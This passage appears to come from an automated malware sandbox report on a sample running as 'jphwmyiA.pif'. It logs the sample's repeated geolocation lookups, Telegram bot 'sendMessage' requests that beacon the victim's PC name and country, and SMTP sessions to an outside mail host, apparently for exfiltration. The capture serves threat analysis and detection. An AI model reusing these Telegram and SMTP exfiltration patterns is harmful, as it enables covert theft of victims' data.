York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49941	188.114.97.3	443	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:36 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:37 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567526 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yp3BvsxFBBF73%2FiY8IBceYAK5d9NRDGJ6YmcEqkY22ahBU7M%2BrTZ3leZ%2BzrJ2Qod4GWWe%2Bje3E2WPkvwVmygBP7PpTbZ3lVyD6TtvkykUKfV%2F3ZmtlFLNWcDmLnPnl1QtLkp9HAO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee7678c40f69-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1487&rtt_var=595&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1784841&cwnd=250&unsent_bytes=0&cid=b4477194c330b14f&ts=250&x=0"
2025-01-07 12:25:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49953	188.114.97.3	443	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:38 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:38 UTC	855	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567527 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vQj0U%2Fdi0CNfUEbSxQSCiHfyujrezVgv1OLVYovU5nMs0OGB5O48FeppZO8BfTTmT8mXupHufhYCnCYtKe97o34%2FfFDZCnWQl4S0xJ9sNG3yd6ttXmY%2BbVzmXa8VOsN018EvSglr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee7e8a560cb8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1635&rtt_var=619&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1761158&cwnd=179&unsent_bytes=0&cid=06913211a29c6504&ts=165&x=0"
2025-01-07 12:25:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49954	188.114.97.3	443	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:38 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:38 UTC	856	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567527 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gQgby8AoD8mkmYHH%2BqEMSc3IJMXWi2lrceGVpC3O0ORnGdv2nJJTmKMW94oQI2si2akLQSHXoCss52i1NkBec%2BMDfemmctldM92nqINsoBfyEAryJ76fL486GaCuyq1aDk0sM08L"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee7fc9717d0c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=35906&min_rtt=2103&rtt_var=20938&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1388492&cwnd=156&unsent_bytes=0&cid=29e080b78e50b2d8&ts=165&x=0"
2025-01-07 12:25:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49967	188.114.97.3	443	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:39 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567528 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6p98t%2B9M0QRx8UDFAZkNV5J2zFa8NYkhtgjv1wS%2FwUNWw%2BI%2FyEdAg1tC2JlOHQ1s5fb6Umfjupnli2LNDvuMbH69cRvHw8z1JGpBblje%2BYstho4i3QBD3ZjohV4mPULJKogIAIe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee87f826c341-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1612&rtt_var=622&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1733966&cwnd=177&unsent_bytes=0&cid=5f8855b66380364f&ts=159&x=0"
2025-01-07 12:25:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49968	188.114.97.3	443	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:40 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-07 12:25:40 UTC	851	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567529 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rJaTpphDj7tsrZ1XZMjImweiKmsMKrzptnJigYkGmtVLeGyg5UqHSNCH0wGu2fyhIxxTvHZSbnXlMXpuFKtZ%2B8x8vo6x6dAHAnLtp0fXgnHcBvx9bJLvpIv4AKgF937j3lapVJE0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee899f6f0f5d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1493&rtt_var=564&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1935056&cwnd=229&unsent_bytes=0&cid=f4395ffaffb76e0e&ts=153&x=0"
2025-01-07 12:25:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49981	188.114.97.3	443	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:41 UTC	857	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567530 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VM5728nQb2iMrtK2Gsj1cZHaUd4fDPXrgKU09SBUlDGzfRh3j%2FGoV2ouZehE8vbJx1bEkKtIncx0PJVlibEYEIL1i9DHOeKxw0aytfX%2FRCX3eWu%2Bq34%2BgtQg2HzgY59iJGhgvO5L"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee90dcf47ce2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1973&rtt_var=755&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1436301&cwnd=238&unsent_bytes=0&cid=92774d0cc90a4333&ts=140&x=0"
2025-01-07 12:25:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49982	188.114.97.3	443	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:41 UTC	849	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567530 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gx4DHVXXYgoZtH6p33Zdp6Qu37uo1GMey97Te0rCI33Mvyhx3r4wj3E08cvg81NkmdUDyrhq1A0sLbFHCGmAzv58WriVTPslNEAx286I3Tl1tXaSuhfoFzAXZh43qmbTU6jLZE79"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee927c402365-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1834&min_rtt=1818&rtt_var=714&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1498973&cwnd=154&unsent_bytes=0&cid=4a2da2d71eb8b4c6&ts=154&x=0"
2025-01-07 12:25:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49986	149.154.167.220	443	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:41 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2007/01/2025%20/%2021:58:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-07 12:25:42 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 07 Jan 2025 12:25:42 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-07 12:25:42 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49996	188.114.97.3	443	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:42 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-07 12:25:42 UTC	851	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567532 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pPzOK5vUA40WP1l7eaIxDs6Rv7z5MEp0MdBfOzFdfIHabrn98XJduj2aG6dpl3rmTMkTOg8zFpIS2lRTfXgREkUGQTbfKxkuJuSpjatJRgc2YQB0Ht7FpIzYBYG35gZCeGPXS%2F2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee9b5838ef9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1937&min_rtt=1928&rtt_var=742&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457085&cwnd=219&unsent_bytes=0&cid=dffa73dd4e77d663&ts=149&x=0"
2025-01-07 12:25:42 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50001	149.154.167.220	443	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:43 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2007/01/2025%20/%2022:17:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-07 12:25:43 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 07 Jan 2025 12:25:43 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-07 12:25:43 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 7, 2025 13:25:42.084903955 CET	587	49989	208.91.198.176	192.168.2.5	220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/07/25 12:25:41
Jan 7, 2025 13:25:42.085587978 CET	49989	587	192.168.2.5	208.91.198.176	EHLO 405464
Jan 7, 2025 13:25:42.243477106 CET	587	49989	208.91.198.176	192.168.2.5	250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions 250-AUTH NTLM CRAM-MD5 LOGIN 250-SIZE 31457280 250-HELP 250-AUTH=LOGIN 250 STARTTLS
Jan 7, 2025 13:25:42.243871927 CET	49989	587	192.168.2.5	208.91.198.176	STARTTLS
Jan 7, 2025 13:25:42.406136990 CET	587	49989	208.91.198.176	192.168.2.5	220 Ready to start TLS
Jan 7, 2025 13:25:48.942564011 CET	587	50037	208.91.198.176	192.168.2.5	220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/07/25 12:25:48
Jan 7, 2025 13:25:48.942774057 CET	50037	587	192.168.2.5	208.91.198.176	EHLO 405464
Jan 7, 2025 13:25:49.093192101 CET	587	50037	208.91.198.176	192.168.2.5	250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions 250-AUTH NTLM CRAM-MD5 LOGIN 250-SIZE 31457280 250-HELP 250-AUTH=LOGIN 250 STARTTLS
Jan 7, 2025 13:25:49.093908072 CET	50037	587	192.168.2.5	208.91.198.176	STARTTLS
Jan 7, 2025 13:25:49.252965927 CET	587	50037	208.91.198.176	192.168.2.5	220 Ready to start TLS
Jan 7, 2025 13:25:50.536334991 CET	587	50048	208.91.198.176	192.168.2.5	220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/07/25 12:25:50
Jan 7, 2025 13:25:50.536638021 CET	50048	587	192.168.2.5	208.91.198.176	EHLO 405464
Jan 7, 2025 13:25:50.684482098 CET	587	50048	208.91.198.176	192.168.2.5	250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions 250-AUTH NTLM CRAM-MD5 LOGIN 250-SIZE 31457280 250-HELP 250-AUTH=LOGIN 250 STARTTLS
Jan 7, 2025 13:25:50.684700966 CET	50048	587	192.168.2.5	208.91.198.176	STARTTLS
Jan 7, 2025 13:25:50.846302986 CET	587	50048	208.91.198.176	192.168.2.5	220 Ready to start TLS

Target ID:	0
Start time:	07:24:51
Start date:	07/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x7c0000
File size:	1'620'872 bytes
MD5 hash:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
